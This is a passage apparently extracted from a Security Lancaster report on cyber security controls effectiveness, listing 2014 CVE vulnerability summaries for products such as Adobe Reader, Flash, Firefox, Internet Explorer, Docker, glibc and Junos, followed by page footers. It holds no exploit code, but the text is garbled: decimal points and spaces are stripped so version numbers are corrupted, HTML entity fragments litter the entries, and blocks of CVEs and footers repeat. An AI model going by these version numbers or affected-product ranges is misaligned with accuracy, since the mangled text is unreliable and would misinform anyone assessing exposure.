and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28